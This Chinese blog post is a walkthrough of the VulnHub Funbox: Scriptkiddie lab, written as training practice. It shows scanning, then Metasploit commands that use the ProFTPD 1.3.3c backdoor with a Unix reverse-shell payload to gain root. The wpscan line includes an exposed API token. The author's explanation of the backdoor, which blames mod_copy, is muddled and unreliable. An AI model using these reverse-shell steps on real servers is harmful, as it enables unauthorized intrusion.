Vulnhub学习---FUNBOX:SCRIPTKIDDIE

已于 2023-12-08 13:14:37 修改
阅读量1.3k 收藏
点赞数 6
文章标签: 学习
于 2023-12-08 13:07:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjjj34/article/details/134873151
版权

目录

下载链接

靶场搭建

信息收集

端口扫描

hosts重定向

目录扫描

漏洞利用

下载链接

官方链接:VulnHub

靶场下载链接:https://download.vulnhub.com/funbox/Funbox11.ova

靶场搭建

攻击机:

靶机:

信息收集

端口扫描

nmap扫描服务,发现有很多的端口,我们先去看看80端口,访问一下网站

没有东西,我们点点蓝色字体看看里面会不会有东西。

hosts重定向

发现跳转到funbox11,那么好又是重定向,我们对/etc/hosts文件进行编辑。

刷新一下页面

目录扫描

接下来扫描一下目录

有WordPress,那么我们访问一下,并用给wpscan工具扫描一下有没有可以利用的漏洞。

wpscan --url http://funbox11/wp-admin/install.php -e --api-token=ncpMue7yoUJi54sMafxWaHh4ntwFTTwQWCadedVv6sQ 

发现并没有什么可以利用的漏洞,那么我们只好先跳过这个。我们试试能不能通过其他端口进行渗透。

漏洞利用

我们先搜搜ftp有啥漏洞,没想到还真给我搜到了。

那么我们试试利用这个漏洞,进行渗透

use 0

show payload

set payload payload/cmd/unix/reverse

set rhosts 192.168.4.183

set lhost 192.168.4.50

run

直接就是root权限,完结!!!!!!!!!!!!!!!

ProFTPd-1.3.3c - Backdoor Command Execution 

 ProFTPd-1.3.3c - Backdoor Command Execution POC

这个漏洞的相关原理大家可自行上网上搜索。我就讲讲我对这个漏洞的原理的一些理解,可能有错误希望谅解。

攻击者在FTP客户端中构造一个特殊的FTP命令,其中包含恶意用户名。这个恶意用户名被设计成包含特定的字符串,能够绕过身份验证并利用mod_copy模块的后门。在ProFTPD服务器接收到这个恶意命令时,它会解析命令中的用户名,并触发mod_copy模块中的漏洞代码。这个漏洞代码会识别到恶意命令中的特殊字符串,并执行该命令,从而导致攻击者可以在服务器上执行任意命令。

在解析过程中,pr_fnvlist_parse函数会检查用户名中的特定字符串,并识别出后门代码的存在。一旦识别到后门代码的存在,攻击者构造的恶意命令中的恶意部分将被解析为可执行的命令,并在服务器上执行。

YasYs
关注
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 731
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
vulnhub--Funbox: Under Construction!
venu_s的博客
08-04 472
靶机介绍 Description: As always, it’s a very easy box for beginners. Download:https://www.vulnhub.com/entry/funbox-under-construction,715/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.177 目录扫描 gobuster dir -u http://19
Vulnhub-FUNBOX: SCRIPTKIDDIE渗透
laoyanCZ的博客
11-30 1981
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。如果有不懂的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉靶机:本文靶机下载连接-戳我直接下载!👈由于这个这个漏洞利用成功之后,可以直接拿到root权限,所以就不涉及提权了,获取flag文件之后本靶机的渗透就结束咯PS:其实通过nmap的vuln脚本可以直接扫描出来,亲手把自己脸打了哈哈哈。
VulnHubFUNBOX: SCRIPTKIDDIE渗透
m0_73481504的博客
02-25 1132
1.需要收集信息,根据扫描出的结果做分析。2.了解使用msf渗透需要的步骤3.了解FTP的ProFTPD 1.3.3c漏洞利用。
靶机渗透练习32-Funbox11-Scriptkiddie
hirak0的博客
04-18 1227
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ Description As always, it’s a very easy box for beginners. Add to your /etc/hosts: funbox11 This works better with VirtualBox rather than VMware. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: I
vulnhubFunbox: Scriptkiddie
qwweggfe的博客
08-29 363
靶机ip:192.168.181.155 kali IP : 192.168.181.129 首先进行IP扫描 然后我查看ip端口开启哪些服务 我们看见他开启了80端口,于是我们打开网页进行查看 于是我进行目录探测,看看他有没有给我们一些提示 gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 于是我认为他们开...
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox11(Scriptkiddie
Aluxian_的博客
09-21 1114
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。FunBox系列第十一个靶机了 也是最后一个比较简单1.信息收集 获取ip地址 和端口信息2.metasploit的基本操作3. 了解后门命令执行漏洞这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助!至此这个系列更新完啦!🙂。
vulnhub刷题记录(Funbox: Scriptkiddie
ailx10
08-29 196
英文名称:Funbox: Scriptkiddie中文名称:FUNBOX:脚本小子发布日期:2021 年 7 月 20 日难度:容易描述:与往常一样,它对初学者来说是一个非常简单的盒子。添加到您的 /etc/hosts: funbox11下载地址:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 1、主机发现主机发现2、端口扫描端口扫描...
vulnhub靶场之FunBox-11
qq_58091216的博客
06-21 545
爆破了17分钟还是没有爆破出来,那么我们就要换一个思路进行,我们可以从端口进行入手,我们可以看到开放了21端口,而且服务是ProFTPD 1.3.3c,我们使用msf进行搜索。我们可以看到页面没有全部显示出来,可以知道是域名和IP没有绑定,我们进行绑定。探测出来了好多的端口,但是有用的端口只有21端口和80端口。我们扫描到一个登录页面,我们可以试试爆破密码和用户名。我们可以看到攻击成功,而且权限是root。第一次我们失败了,因为我们没有设置载荷。我们可以看到有漏洞,我们进行漏洞利用。
Vulnhub 靶场】【Funbox: Scriptkiddie】【非常简单】【20210720】
惟忆
12-26 969
靶场介绍:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 靶场下载:https://download.vulnhub.com/funbox/Funbox11.ova 靶场难度:简单 发布日期:2021年07月20日 文件大小:1.3 GB 靶场作者:0815R2d2 靶场系列:Funbox 打靶耗时:1+ 小时,极其的简单。
Vulnhub-Funbox: Rookie(Funbox2)靶机渗透
m0_68117643的博客
07-07 1250
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
vulnhub--Funbox: Lunchbreaker
venu_s的博客
07-27 406
靶机介绍 Description:It’s a box for beginners and can be pwned in the lunch break. Download:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描,开放了可以使用anonymous用户登录的21端口,以及22和80端口 目录扫描,有一个robots文件
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 697
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
嵌入式通信协议:UART简明学习笔记
weixin_73867577的博客
10-31 748
学习UART串口的简明学习笔记
ORB-SLAM2源码学习:ORBextractor.cc:IC_Angle 利用灰度质心法求解关键点方向角
2301_76831056的博客
11-01 658
IC_Angle 利用灰度质心法求解关键点方向角并在computeOrientation函数中被调用计算图像中所有特征点的方向。
嵌入式通信协议:MODBUS简明学习笔记
最新发布
weixin_73867577的博客
11-02 208
学习Modbus的简明学习笔记
jsp web学习二(比较老的啦)
qq_52122048的博客
10-29 1069
JavaBean模式(MVC)适合开发复杂的web应用,在这种模式下,servlet负责处理用户请求,jsp负责数据显示,javabean负责封装数据。Servlet+JSP+JavaBean模式程序各个模块之间层次清晰,web开发推荐采用此种模式。一个良好的JavaWeb项目架构应该具有以上的11个包,这样显得层次分明,各个层之间的职责也很清晰明了,搭建JavaWeb项目架构时,就。
学习力体系
m0_46221544的博客
10-29 350
在一个小镇上,有一位年轻的学者小明,梦想成为一名科 学家。然而,他总是感到学习困难,知识无法长久保持。有一天,他遇到了一位智者,智者告诉他:“学习的力量能够改变命运。”小明意识到,提升学习力是实现梦想的关键,从此开始探索学习方法的旅程。通过以上方法,小明的学习能力不断提升,最后实现了自己的梦想。每个人都可以通过这些方法来加强自身的学习力,迎接更加美好的未来。怎样才能让知识长久保持?如何有效地提升学习力?
人工智能入门要学习多久?
cd_farsight的博客
10-31 278
人工智能是一个快速发展的领域,新的技术和算法不断涌现。这可能需要你定期投入时间,比如每月至少花费几个小时来跟踪最新的研究和发展。如果你是计算机科学或相关专业的学生,或者对计算机科学有较深的兴趣,可能能更快地掌握。实践项目的时间可以因项目的复杂性和范围而异,通常需要几个月的时间来完成。学习人工智能所需的时间可以根据个人的学习速度、目标和深度有所不同。这通常需要几个月的时间,具体取决于个人的数学背景。:Python是进行人工智能学习的主要语言,建议从基础开始学习,这也是一个月左右的时间可以掌握。
FUNBOX: UNDER CONSTRUCTION!
08-16
它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值